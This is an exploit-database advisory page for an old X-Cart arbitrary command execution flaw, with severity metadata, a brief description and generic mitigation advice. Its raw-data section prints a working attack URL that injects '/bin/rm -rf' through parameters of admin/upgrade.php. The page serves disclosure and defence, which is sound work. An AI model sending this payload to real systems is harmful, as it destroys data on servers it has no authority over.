header-logo
Suggest Exploit
vendor:
X-Cart
by:
Unknown
9
CVSS
CRITICAL
Arbitrary Command Execution
78
CWE
Product Name: X-Cart
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:qualiteam:x-cart
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

X-Cart Arbitrary Command Execution

X-Cart is prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI.

Mitigation:

It is recommended to sanitize user inputs and validate parameters in the URI to prevent command execution vulnerabilities. Additionally, restricting access to sensitive functionality and regularly updating the application can also help mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9560/info
 
X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. 

http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..

Navigation

Suggest Exploit

Services By CQR